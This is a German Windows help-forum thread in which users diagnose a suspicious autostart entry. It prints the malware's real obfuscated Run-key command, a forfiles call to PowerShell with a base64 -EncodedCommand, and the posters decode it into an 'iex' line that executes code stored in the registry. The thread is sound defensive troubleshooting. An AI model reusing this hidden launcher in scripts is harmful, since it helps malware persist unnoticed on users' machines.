Ergebnis 1 bis 15 von 15
Danke Übersicht19Danke
  • 3 Post By areiland
  • 2 Post By areiland
  • 1 Post By Tomsen
  • 2 Post By areiland
  • 3 Post By build10240
  • 3 Post By areiland
  • 1 Post By .Bernd
  • 4 Post By Tomsen
Thema: forfiles Hallo Miteinander Ich hab ein Win 10 Problem wo ich echt nicht weiterkomme oder auf einem riesen Schlauch stehe.. Kurz ...
  1. #1
    Tomsen
    bekommt Übersicht

    forfiles

    Hallo Miteinander

    Ich hab ein Win 10 Problem wo ich echt nicht weiterkomme oder auf einem riesen Schlauch stehe..

    Kurz nach der Pin eingabe erscheint für 1 sek. dieses Dos Fenster (siehe Anhang)
    Da stehen wohl viele Sachen drin, die bringen mich aber nicht weiter
    Der forfiles Eintrag steht auch im Autostart...wenn ich den deaktiviere erscheint wohl das Dos Fenster nicht mehr aber die ganzen Einträge im Symbolfenster in der Taskliste unten rechts sind dann weg.
    Ausser dem erscheinen dieser Dos Fehlermeldung merke aber nichts...funktioniert alles wie es soll.
    Das einzige was ich im i-net gefunden habe ist ein Wahnsinnig vertrauenswürdiges Programm das man installieren soll die die forfiles wieder herstellen soll.

    vielleicht kann mir hier ja jemand helfen...danke schonmal im voraus

    Gruss Tomsen
    Miniaturansichten angehängter Grafiken Miniaturansichten angehängter Grafiken forfiles-dos-fehler.png  

  2. #2
    areiland
    Computer Legastheniker Avatar von areiland

    AW: forfiles

    Und den genauen Autostart für Forfiles magst Du uns nicht einfach mal zeigen? Denn Forfiles wird vom System normalerweise gar nicht in Anspruch genommen - hier ist also von einer möglichen Manipulation des Systems auszugehen.
    Henry E., yellow und Tomsen bedanken sich.

  3. #3
    Tomsen
    bekommt Übersicht

    AW: forfiles

    Danke für deine Antwort...
    Doch natürlich


    forfiles-unbenannt.png

  4. #4
    areiland
    Computer Legastheniker Avatar von areiland

    AW: forfiles

    Öffne mal eine Eingabeaufforderung und führe den Befehl: wmic startup list full aus. Das Ergebnis von Forfiles kopierst Du dann und zeigst es mir. Ich würde nämlich gerne die gesamte Befehlszeile sehen.
    yellow und Tomsen bedanken sich.

  5. #5
    Tomsen
    bekommt Übersicht

    AW: forfiles

    forfiles-1.png
    forfiles-2.png
    yellow bedankt sich.

  6. #6
    areiland
    Computer Legastheniker Avatar von areiland

    AW: forfiles

    Führe den Befehl bitte in einer Eingabeaufforderung mit Adminrechten aus! Ausserdem: Man kann den gewünschten Teil einer Ausgabe problemlos auch mit der Maus kopieren und hier als Text einfügen.
    yellow und Tomsen bedanken sich.

  7. #7
    Tomsen
    bekommt Übersicht

    AW: forfiles

    ja...deutlich einfacher


    verborgener Text:
    Windows PowerShell
    Copyright (C) Microsoft Corporation. Alle Rechte vorbehalten.

    PS C:\WINDOWS\system32> wmic startup list full


    Caption=OneDriveSetup
    Command=C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup
    Description=OneDriveSetup
    Location=HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SettingID=
    User=NT-AUTORITÄT\Lokaler Dienst


    Caption=OneDriveSetup
    Command=C:\Windows\SysWOW64\OneDriveSetup.exe /thfirstsetup
    Description=OneDriveSetup
    Location=HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SettingID=
    User=NT-AUTORITÄT\Netzwerkdienst


    Caption=IQTray
    Command=IQTray.lnk
    Description=IQTray
    Location=Startup
    SettingID=
    User=MIFCOM-MANTEK\Tkeus


    Caption=myCloud Desktop
    Command=myCloud Desktop.lnk
    Description=myCloud Desktop
    Location=Startup
    SettingID=
    User=MIFCOM-MANTEK\Tkeus


    Caption=OneDrive
    Command="C:\Users\Tkeus\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Description=OneDrive
    Location=HKU\S-1-5-21-3995944002-1993681224-4128824138-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SettingID=
    User=MIFCOM-MANTEK\Tkeus


    Caption=Steam
    Command="C:\Steam\steam.exe" -silent
    Description=Steam
    Location=HKU\S-1-5-21-3995944002-1993681224-4128824138-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SettingID=
    User=MIFCOM-MANTEK\Tkeus


    Caption=Iconcon
    Command=forfiles /p C:\Windows\system32 /s /c "cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsARAA4ADYA RgA4AEEARQAxAC0ANgBGAEQAQQAtAEUARABCAEUALQA3ADEANAA3AC0AOAAzADkANgBEADAANgBBAEEA OQA5ADEAfQAnACkALgBTAA==" /m p*ll.*e
    Description=Iconcon
    Location=HKU\S-1-5-21-3995944002-1993681224-4128824138-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SettingID=
    User=MIFCOM-MANTEK\Tkeus


    Caption=Vivaldi Update Notifier
    Command="C:\Users\Tkeus\AppData\Local\Vivaldi\Application\update_notifier.exe"
    Description=Vivaldi Update Notifier
    Location=HKU\S-1-5-21-3995944002-1993681224-4128824138-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SettingID=
    User=MIFCOM-MANTEK\Tkeus


    Caption=SpyderUtility
    Command=C:\PROGRA~2\DATACO~1\SPYDER~1\Utility\SPYDER~1.EXE
    Description=SpyderUtility
    Location=Common Startup
    SettingID=
    User=Public


    Caption=SecurityHealth
    Command=%windir%\system32\SecurityHealthSystray.exe
    Description=SecurityHealth
    Location=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SettingID=
    User=Public


    Caption=Launch LCore
    Command=C:\Program Files\Logitech Gaming Software\LCore.exe /minimized
    Description=Launch LCore
    Location=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SettingID=
    User=Public


    Caption=AdobeAAMUpdater-1.0
    Command="C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
    Description=AdobeAAMUpdater-1.0
    Location=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SettingID=
    User=Public


    Caption=AdobeGCInvoker-1.0
    Command="C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe"
    Description=AdobeGCInvoker-1.0
    Location=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SettingID=
    User=Public



    PS C:\WINDOWS\system32>
    Geändert von Henry E. (12.04.2019 um 14:04 Uhr)

  8. #8
    build10240
    gehört zum Inventar

    AW: forfiles

    Das sieht verdächtigt nach der kürzlich in der c't vorgestellten DOSfuscation aus, also der Versuch Malware auszuführen. https://www.heise.de/select/ct/2019/04/1549874948507251
    yellow, Tomsen und .Bernd bedanken sich.

  9. #9
    Tomsen
    bekommt Übersicht

    AW: forfiles

    hoppla...
    Da scheint es auch noch nicht so wirklich ein Lösung zu geben

    jedenfalls vielen Dank für deine Bemühung !

  10. #10
    areiland
    Computer Legastheniker Avatar von areiland

    AW: forfiles

    Dann lösch doch zunächst mal den Eintrag aus dem Autostart (steht im Registryschlüssel HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run) und führe anschliessend einen offline Virenscan durch.

    Und bitte für die Zukunft: Wenn ich aus einem solchen Auszug nur einen Part sehen möchte, dann möcht ich auch nur diesen Part sehen und nicht trotzdem die gesamte Auflistung der Ausgabe eines Befehles. Etwas eigenes Denken schadet nicht wirklich.
    Tomsen, yellow und Lillecca1994 bedanken sich.

  11. #11
    .Bernd
    gehört zum Inventar Avatar von .Bernd

    AW: forfiles

    Wenn ich das Ziel anschaue:;
    p*ll.*e
    powershell.exe
    rdpshell.exe
    lpkinstall.exe

    Zu -ec finde ich nichts bei forfiles oder cmd.
    Der Kiste würde ich keinen Millimeter mehr trauen.
    Tomsen bedankt sich.

  12. #12
    Tomsen
    bekommt Übersicht
    Ja... So gings mir auch, ich trau der ganzen Sache auch überhaupt nicht und weitere infos hab ich keine mehr gefunden...
    Die lösung... Format c: windows 10 neu aufgesetzt.

    Danke nochmals für eure Hilfe
    Henry E., .Bernd, yellow und 1 weitere bedanken sich.

  13. #13
    build10240
    gehört zum Inventar

    AW: forfiles

    Zitat Zitat von .Bernd Beitrag anzeigen
    Wenn ich das Ziel anschaue:;

    powershell.exe
    rdpshell.exe
    lpkinstall.exe

    Zu -ec finde ich nichts bei forfiles oder cmd.
    Der Kiste würde ich keinen Millimeter mehr trauen.
    Nach der Syntax von forfiles würde der Befehl cmd /c powershell.exe -ec aQB... ausgeführt Der Parameter ec könnte eine Abkürzung von -EncodedCommand sein. Demnach wäre der Buchstabensalat Base64 kodiert. Jagt man das durch einen Konverter und löscht nicht darstellbare Zeichen, erhält man folgenden Powershell-Befehl: iex (gp 'HKCU:\Identities\{D86F8AE1-6FDA-EDBE-7147-8396D06AA991}').S

  14. #14
    .Bernd
    gehört zum Inventar Avatar von .Bernd

    AW: forfiles

    Das ist UTF-16
    https://www.base64decode.org/
    aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsARAA4ADYA RgA4AEEARQAxAC0ANgBGAEQAQQAtAEUARABCAEUALQA3ADEANAA3AC0AOAAzADkANgBEADAANgBBAEEA OQA5ADEAfQAnACkALgBTAA==
    iex (gp 'HKCU:\Identities\{D86F8AE1-6FDA-EDBE-7147-8396D06AA991}').S
    IEX
    https://docs.microsoft.com/en-us/pow...w=powershell-6

    Identities
    https://www.radford.edu/~nethelp/outlook/identities.htm

    GP unbekannt, "group policies"?
    .s unbekannt
    Müsste man in Powershell suchen.

    Ich kann nur spekulieren, ob da versucht wurde, Outlook bzw Mail zu kapern und als Spam- oder Malwareschleuder nutzen zu wollen, ohne das Anwender das mitbekommt, weil die Rechte verändert worden sind.

  15. #15
    build10240
    gehört zum Inventar

    AW: forfiles

    gp ist die Abkürzung für Get-ItemProperty. Zur Manipulation ist der Befehl so aber m.E. nicht geeignet.

Lesezeichen


  • An Google übertragen Google
  • -->

    Berechtigungen

    • Neue Themen erstellen: Nein
    • Themen beantworten: Nein
    • Anhänge hochladen: Nein
    • Beiträge bearbeiten: Nein
    •  

    1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162